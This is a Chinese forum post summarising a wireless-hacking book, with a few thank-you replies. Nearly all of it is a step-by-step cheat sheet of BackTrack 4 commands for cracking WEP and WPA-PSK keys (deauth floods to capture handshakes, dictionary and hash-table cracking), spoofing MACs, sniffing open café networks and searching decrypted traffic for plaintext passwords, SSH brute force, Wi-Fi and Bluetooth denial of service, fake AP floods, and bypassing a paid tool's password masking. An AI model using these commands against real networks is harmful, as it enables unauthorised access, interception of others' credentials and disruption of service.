ubnt解决方案
查看: 15425|回复: 34

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

1306

回帖

3751

积分

439 小时

在线时间

少校

灌水天才

注册时间
2008-11-14
金币
2277 个
威望
7 个
荣誉
6 个
累计签到:14 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-10 10:59 |显示全部楼层
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
2 J0 c" v7 t& c) r
& I2 ^( \  B) D以下所有操作均在BackTrack 4中进行。& h4 c8 p& f2 `0 M
- V3 F- g& X) v2 u$ M. l* o2 b

1 r$ c# ^6 U' t4 }无线WEP加密P解:
9 h( }9 L1 T4 y" m- i) H  t# n' j% \3 U" \) h* M
注入P解:
' B- F3 k1 U) n% w
- L# Y, {- v! K/ `! Q9 a% Y+ iifconfig
: _, T2 o9 S! m
$ t% m# t+ J7 L3 t2 K# c5 K0 R7 yifconfig –a
, k" R  G3 K0 P2 U, j
& Q6 o2 \) G8 kifconfig wlan0(无线网卡) up
7 F- j! W* f! a/ b$ ~" X
0 t# E! q: G$ |6 {' I: Aairmon-ng start wlan0
6 u3 a% D' T" ~
: ~( ?9 }( O+ F/ x5 C  \- Xairodump-ng mon03 c, d% B; V: y1 _# `7 n

4 E( s3 O1 _& Y& Z1 x/ s1 ~airodump-ng --ivs –w ivsfile –c 频道 mon0或9 @( b) j8 N$ P( J

) W0 g1 L- I3 u, M3 c& Cairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
& _/ |6 u5 S& k5 \) N
/ b( L  h9 l6 U; [9 t1 eaireplay-ng -3 –b BSSID –h Station mon01 M; T) ^. P+ n. d5 c1 P! p! g8 F
1 I$ ^% m) j; @
aircrack-ng ivsfile-01.ivs5 ~5 h, ?& c% X8 i, W" U7 `9 W. }
  z( ~# |4 Q' ~3 @/ i  y
虚连接P解(适用于无客户端连接APP解)" w8 i$ C. Q8 e: Y; a

9 L, A/ q' Q0 z# rifconfig( ^; N& V6 |2 H2 d% M( L

5 @2 r& Y  b8 o8 X3 R/ Gifconfig –a) y( S# @. x1 w  n) n% D8 Z
# `4 Y* m3 u- c6 C
ifconfig wlan0(无线网卡) up- O: Y5 F1 H* j8 z% q! O" C% w! [

' ?  j( b* Y5 Hairmon-ng start wlan0$ @0 ~' _* |6 U: a* b

3 O7 e4 d" x+ W. ^airodump-ng mon0' N+ x  z7 A6 _, p# G

3 U, ]& S% P4 z, t+ [airodump-ng --ivs –w ivsfile –c 频道 mon0或
, E+ `& M! P+ d0 e& b9 s) `: m: f+ C6 n/ m9 R. k+ Z
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon02 Q  j( z9 V, B+ ^) k5 n4 o  j8 r

1 Y& E$ q$ S' b9 B) @; l$ P8 C  waireplay-ng -1 0 –e SSID –a BSSID –c Station mon0
  z% N! D+ B( @  g) F5 x. v2 E: L' }3 w
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon04 q1 s+ S& E/ w/ x. N  l

+ f3 _/ S# [; j' {) `6 k$ naircrack-ng ivsfile-01.ivs3 X2 A, b9 O7 D0 N8 _9 T  J; G

1 B7 ~, |# i. @* Z2 Y* T
; h' L, z- b/ G还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
, X) i4 {4 ^. |5 @; K
( d0 ]. }/ t+ q- ~/ w
9 {& I* `& h( u: G" DWPA-PSKP解
# J4 ~* j, h% N# ^5 q) e
5 f* }# A) o- D$ e9 B6 o/ kifconfig
: R  ~5 e. a$ ^
# l" D6 ?, Z1 o" j. _ifconfig –a5 ], p" c! M( H; |/ I
' m' l9 h( A3 a% p2 n* D
ifconfig wlan0(无线网卡) up
) V/ b/ R# X4 F( l
4 i8 w1 _: T5 l+ A/ }2 Jairmon-ng start wlan0
5 X2 I3 z: x+ @* R+ y  m
" E5 p- U+ g  }9 L2 A5 `airodump-ng mon02 P/ r, J- a0 ^* C0 H

) f% M+ g" n5 _: `! ^: {airodump-ng –w capfile –c 频道 mon0
2 y* o8 o  l6 d7 a. W
" t# L6 U6 f( faireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包( [* G% T, ~- Q0 ?
6 F! d9 U) f# J' Q
aircrack-ng –w Dic capfile-01.cap或
( P7 V1 [2 v2 z
' [6 H* v+ o- W- w4 e# Fcowpatty –f Dic –r capfile-01.cap –s SSID+ w9 ]) Q% U. @4 r% |5 ]7 |
! [0 h4 V! @# W- A1 F' ^
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID* V7 \5 x5 g8 U# J: f8 d) l

' p( E& x& X& U+ o3 g傻瓜式P解软件SpoonWPA。1 t/ n- J2 b$ _& F: f- q2 C. f! d

% f. G  [. _1 J& pBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
$ l" j& ]: x& g, n9 f8 w9 R, ?' V  P" }5 r7 t7 ?

, B1 W( {# v, V$ v9 s) j字典文件的生成和上传
. B- e+ U5 M# ~( U
* t- P9 f8 M9 p0 B- m) P在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
/ a5 K! x! p7 p1 x4 ~4 x0 e
6 P" U6 f' N8 u5 w# {( B6 P% ~% q' C7 \* d' [+ t
BT4下开启Tftp:Services—TFTPD—start TFTPD
; P6 K4 g) R3 |
  I+ k& F9 K) ~在Windows的CMD中运行 tftp –i IP put **.dic7 h3 {3 Y% l' q5 M' A4 {6 d' E

  K+ o; Y% ?4 S) V* h6 P" l% D& t5 ]2 F
BT4下开启SSH:Services—SSH—start SSH) \" N' N" d5 Z, j" ~& T2 o* k

! S* E( @- O7 yWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
9 r8 L" u8 _  O% F# z) }8 W( d* S
' c: O$ M' @4 O  \: C. P
AP限制MAC时的解决
' x2 ~3 J$ Z4 b" r% z; W! N8 T3 ]
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:* |3 t4 p& r$ f- @/ j2 |  [
; G1 z: m$ ^, O/ M" f4 }5 z
ifconfig wlan0 hw ether NewMAC5 f- Z, S, ?/ ?0 ?5 E3 }2 h6 N
2 ~; p: ^( j6 T$ m! g- S$ i; U

% O& F/ M, D$ ~0 H7 n关闭SSID广播的AP探测:
% O, L1 s& W# T( _6 ?( ?+ ~) q+ O. P- u$ j! Y+ _- @
1.     Deauth攻击:. P( m% b( \/ C0 r

. {/ k0 N0 x  O1 f$ kairodump-ng mon0
: ~1 F& G* }& J0 g: z, q
8 t, i5 R* R% P( taireplay-ng -0 10 –a BSSID –h Station mon0
' q0 O. [, x! h7 A1 Z8 |5 H# t1 X. s
2.     抓包分析
6 d0 z0 C- z, V; l
0 `$ }' `( b; v0 iOmnipeek" q* j* N) _: v1 o# \
3 y! ]. u% c( w2 u9 i
Tcpdump –n –e –vvv –i 网卡名
: m9 O* [+ S" }5 o  \4 b2 N+ {( U, }; \$ Q3 q8 t% R0 i$ S$ @
3.     暴力P解; _# Y; {. O* i/ N9 ?" B8 k$ F

- u- m7 F" I+ [5 qCharon 1.1暴力P解3 k7 ^! n( `/ t
1 @) H* y4 b+ I. y" h
4 x2 c' l$ Z/ a% e  z0 B
无线加密数据包的解密  p) S3 u! ]  |! J( O, P
* Z' `- |( B0 p& _! \; b+ _

6 l* G7 k8 d! r# i7 Q使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
( E2 m; W2 d. R7 c5 L% z9 D4 L
  t  N6 s  d. n/ Z( k; sFilterNS     DNS解析数据包* r, N' ~$ m% u' F' I9 n
2 t7 T8 h- j7 u" `! S4 y
Filter:HTTP    WEB访问数据包8 u- h0 f! D4 a

+ P1 S" O+ d0 e6 x0 M5 P2 zFilter:msnms   MSN; a9 v' k/ d1 _
. W0 o4 M7 J; W% j/ ~
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。6 N& ^/ A, F1 d' q

6 A* a' g( w; Z/ `使用airdecap-ng解密:
! Y/ o& b1 D$ @2 U; ?% `
3 ~7 d6 y$ l' O' X$ L: n) OAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap( K* ~  c' w( H/ d- B& j& i

% E+ y) \$ ~) [% {
" B, O; R' J0 e$ |- e咖啡馆中无线数据截取(开放式无加密AP), X* z  t* r9 a- ]

) O8 n4 |% y6 i7 C) ^8 s1.Airodump-ng –w data –c频道 mon0
( ?% G; h. g3 z2 j3 j# c; M; J7 m* `6 F# P, [
2.使用WireShark打开分析
. V: f* a9 W. s# K$ U3 Q7 H6 t9 O6 [* {; T' h
% \! H+ |2 I' k
BT4下的渗透工具:
  j" ?( G3 j; B: T) Y) g
3 Q" p, X2 W) }# f' l- Onmap –sP IP/24        判断C段下存活的主机 % N% y5 [) b+ u, L0 n. L
$ q+ j; C$ A* t& [/ T! ^
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放) a' j! Q! k- v; ]/ X3 g/ @, k
1 E5 k# S* `, O& M6 e; O
nmap –vv –sV IP –p port   指定端口的详细信息。。。) c6 V  p$ b& ~6 l' V/ [: j8 Q: K
! p" l8 k3 O: N5 O+ [
namp –O IP/24    判断主机的系统版本+ x3 R( r/ P& R7 }  K, m

% |  G0 x! I( _! q6 l7 c9 \. m6 E/ ^/ W- I, ~2 O; a; @2 G5 x8 B
GUI 版nmap:Zenmap 1 p0 }5 k1 }( i2 w* W$ ?2 C! O& b
8 S* F0 [) [1 L: h

  ?! @' t/ N  N: \& {/ }! }Amap使用:amap –B IP port! n9 a" B, ?  G) ^9 R0 l, }
* r3 d, z, B2 n
Nbtscan(扫描Windows网络NetBios信息):# I3 e% }9 S0 }- E

9 J5 a: y/ t6 y' G, P0 Q: u  vnbtscan –v –s : IP/24
/ S8 ^  g: [9 y" E9 C; k
7 o3 R" Q" w' Q2 |3 ]* V( Gnbtscan –r IP6 A; {# v/ [1 {! g) y$ |
" p- ~, M! V7 ?
  |  g7 `5 \, n  e1 C7 p
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
! n5 T0 S4 Y& a4 x4 E5 _5 A3 t% V" k
1 B! `& e) u* j1 |
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)
! E: l. H' [' c* B' a; u# }& v$ r( W
BruteSSH: ./bruthe.py –h IP –u Username –d Dic4 c2 @9 @. ~4 s* F) E; y

  d& z3 S( A4 D0 TMetasploit3使用0 r7 U' A2 h, g/ c% {4 S
无线D.0.S7 v9 _1 j, P% y$ r
0 G" D  H# g' H& Q0 z

  {# i7 N' J" o$ CAuth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)( d7 a/ }3 h. D- q+ r, P

* B0 W. B& @, g$ v( b" m) i! vairmon-ng start wlan0
/ s3 ~2 J$ @" U' o% \; I( E: I6 t
airodump-ng mon0
( ?! a9 S* m+ ^5 ]% z* p$ _- e6 T- ]  W6 f. j' c
mdk3 mon0 a –a BSSID
8 `: }8 R4 c- u  j$ O
8 Q' l+ B6 K( b: {$ E对所有的AP攻击:mdk3 mon0 a
5 j' z+ ?( c  O; W" z. e" G1 ^2 X0 i# b, m
' r, u! s7 [3 ?$ `$ ?/ d6 d
Deauth Flood 攻击. H8 y" J% T/ g. @3 c) h

+ c3 s3 Q6 M- T9 m; xmdk3 mon0 d –c Channel
% N% X, q. `- n3 E8 t
3 h7 i' i4 I8 m5 Q% |4 L7 O( P图形化D.O.S攻击:Charon1 @2 X, w8 w+ Z9 M8 W& E) k% S% ?3 G

- Y1 b+ b# _+ y1 z0 _8 ~
/ s, K) G, }0 z) r( h/ z当受到攻击时,使用Wireshark抓包可以看到异常信息。
: Q3 a3 `& y& d
3 ^7 l& H/ a% C/ o' @% Y: f# W3 j# t  F$ l8 w2 a" z7 v* s
WPA-PSK高速P解1 `. ~0 f; j! ]! [

2 u. v% `8 i- n4 h9 `6 T' b1.       WPA-PSK PMK Hash TablesP解" Z# n( `' t, E" |+ y8 J  _
' c# r5 f! v+ Q- k' K4 V9 F) B1 ]- `3 X
Cowpatty –d HashTable.hash –r ***.cap –s SSID& [, G8 a: h5 e" y. |7 r9 V

& z' O* B" O" m! H$ s1 MHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
6 \5 l8 e' ~' g1 o0 |+ x8 v
& E4 D& D& h) H4 `2.       GPU辅助高速P解
4 j( D. N( T6 E7 E* Y8 H: W3 |  n
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
; i# B$ p/ i' K6 w; T1 a6 q4 @# d; \' a: K: n
3.       分布式P解& J% k' {1 s9 m& E5 C1 ^

. n$ p5 [7 }7 f; n4 ~$ s( G2 p" F; q7 H+ ^: s
AP的伪造, c/ `; I! T# m/ {  g' q+ \' m

; m& K8 r  k- J$ A6 b0 P2 S把AP的MAC改成目标AP的MAC; {2 x9 }) G8 r0 q! g: ^

6 v5 X& ^- K8 U7 \网卡软AP
6 n0 m" E4 U- Q* j4 S7 M
" s0 m  t: }; F4 I1 V4 \# b9 _6 Z2 M. y, L+ E
伪造大量虚假AP信号:1 |/ q0 C7 P( \9 N2 `- Z

; y/ g1 G( n- N4 [/ a" y8 _随机SSID:mdk3 mon0 b –g –c 频道 & k1 \7 h/ v9 P
1 \) O" B. J9 }0 t# `8 r3 z' @- F
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度
# w! J0 a9 T- C1 z& `/ W& S  B2 T/ S; i. Z* _

- }: _7 }7 K" R, BWar-Driving
+ ?2 |9 Q: d6 X9 v; t# A! K1 h5 c
4 z0 J+ a( L* X热点地图绘制" J) U- ?1 `; `4 u3 e0 p  I
9 V9 e; O; p- q7 S
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
2 P' _. o# u( m( h0 o! O8 c' y6 }7 ~/ c

0 ~0 H$ q6 \7 W8 f6 NNetstumble
7 u/ C$ y& W! F/ i6 X: ^. P( q( _$ z, @- y' m+ T
. m/ j: Z7 [  w0 e
蓝牙Hacking
# h9 q2 F1 w  @4 K7 k" ?+ X
2 O% s  B3 Z. p  t9 e, }& R8 kWindows下的Blue Soleil工具
0 f" w: o) V, l" R" o  C" W7 I% d! D' m( S: c1 g. J" }# W/ @; h( t
BT4:* a- \8 I4 L5 _' w) z% s
% R+ ~5 k$ H8 c# f! f; J, L
hciconfig 查看蓝牙适配器) z: E& n1 ~9 C
0 q/ K" s2 J+ g$ x
hciconfig hci0 up 载入蓝牙适配器
+ V6 J) r) m4 y  I- A- h( E& }4 \. @" b) D  o
hciconfig hci0 class 蓝牙适配器详细信息& T4 m0 l4 ?! F3 }3 k

7 x2 Z0 P3 `( S6 O" u+ }
2 H' q6 n* E, y# ^& j" a9 phcitool(扫描蓝牙)
; D5 [4 O( C% D2 l! a% H/ i9 s( o1 a) ?- U8 P- T
hcitool –i hci0 scan) V0 W1 y( v; L0 t) K: u3 A. p  r

  T5 Z( I2 P) [! D) {BTscanner(扫描蓝牙)
+ E2 q1 t/ q8 m" c; U
: K" c6 X/ \8 s9 ]& Y% t
4 R1 s7 |/ S0 I4 U, j蓝牙攻击:
8 e% K' b: ?, k  O$ y% ]
& y4 _- K6 d+ B. yBlueBugging (适用于BlueTooth V1.1的手机)
0 J0 N2 F5 ]3 ?5 v( s' K+ G
1 d) H( S! Q5 M9 ^1 _" EBluebugger工具:( d7 y6 \; K' E# E+ b; O

. [2 U" A, d1 W0 d" I$ W7 oBulebugger –a HD_Addr info
. Z. }9 L8 A* e8 y% h
0 Z3 s2 o+ l- y0 [' }" G
- v! s$ c' |9 vBlueJacking% J0 |" f- X* B
1 b4 \' H( {) i" \
实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
9 t! J5 f' z: t# Q3 z2 D3 Z1 N! Q* g' e
6 \: V/ w+ R9 V! F8 U) _" ?% P9 Y/ f5 U. q2 ~/ R1 a* ?9 k4 I
HD_Addr修改:
% [$ i9 Y9 G2 T+ c* C+ C
$ m+ U& y3 Q; s( Q8 H5 J- WBdaddr工具" a! E  b% l2 p) `$ `: p! Y& k( E

# [* f* h7 A* ]bdaddr –i 蓝牙设备名 新HD_addr- j: `. f9 z# f& n, a* V

; v6 a" `& L: ?6 N/ M! u. A3 ]) e: q- [* _0 {% H  G: v  @# k$ e
蓝牙D.O.S
. L1 d5 |* }2 O: u$ f  w+ K) }7 d6 D- Z
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
! e# C7 X  U  F; V6 a' n) K! T; ]6 T. w7 C
hciconfig
. m/ ?4 y1 m, l# O: x* E) L* S4 @! B( T
hciconfig hci0 up
  A( U5 F! g0 ~
0 C. {2 X" S9 b. G3 D4 phcitool –i hci0 scan
' w4 t1 `) L" W# p
/ {6 Y8 Z! ]  g% r$ a& r. `) sl2ping –s 10000 –目标MAC
4 i, K$ o4 X; M5 p% m, N3 y+ ^0 S  M, p% _
3 D" c" Q/ z9 L
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
2 o* Q& y. F9 Z  @' ?- n! s
# o8 b  \& i, F) ~! [, ?./fang –r ************-############ -s: W) s& M& M- g" G' v

( A# G) L  v, B" ?7 w% y3 G9 ?暴力P解************-############的蓝牙设备
$ A' ^1 e& ^4 o9 I( f: V  ~
3 D5 E! _" G1 l( l7 f4 D* }./fang –l 各厂商BD_Addr分配! ^9 h0 N# ]/ |6 f- _8 |

7 g: t; o) p, S6 h+ c% t$ ?# P- w$ f2 _+ j0 u; j1 i+ `
WifiZoo使用
$ o# f1 b7 \+ s% q/ d8 d8 P4 r& G% \1 ]( L3 L- P# `3 e
./wifizoo.py –c Capfile/ ]. t0 H, d- D, f8 f- y0 z

0 r: ^2 o  X& c7 s% C) X* C访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

176

回帖

850

积分

49 小时

在线时间

中尉

注册时间
2009-10-19
金币
656 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

56

回帖

143

积分

10 小时

在线时间

上等兵

注册时间
2008-12-18
金币
86 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

374

回帖

2298

积分

114 小时

在线时间

少校

注册时间
2009-7-5
金币
1841 个
威望
8 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

561

回帖

1138

积分

25 小时

在线时间

上尉

注册时间
2010-1-28
金币
566 个
威望
0 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

111

回帖

262

积分

61 小时

在线时间

少尉

注册时间
2010-2-6
金币
131 个
威望
2 个
荣誉
0 个

尚未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

70

回帖

763

积分

36 小时

在线时间

中尉

注册时间
2008-3-8
金币
687 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

266

回帖

960

积分

539 小时

在线时间

中尉

注册时间
2010-2-20
金币
592 个
威望
5 个
荣誉
1 个
累计签到:13 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

57

回帖

92

积分

14 小时

在线时间

上等兵

注册时间
2010-1-25
金币
32 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
9 n+ J# x) W3 N' b! W借来看看。
回复

使用道具 举报

52

回帖

159

积分

19 小时

在线时间

上等兵

注册时间
2009-6-29
金币
103 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
. w7 t( f4 v% z  u- m呵呵 其实也不贵 21块 快递再一点
2 S; \3 D1 @9 m  [我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

289

回帖

449

积分

105 小时

在线时间

少尉

注册时间
2010-1-14
金币
134 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

22

回帖

157

积分

7 小时

在线时间

上等兵

注册时间
2010-2-25
金币
134 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2025-5-1 17:41

返回顶部 返回列表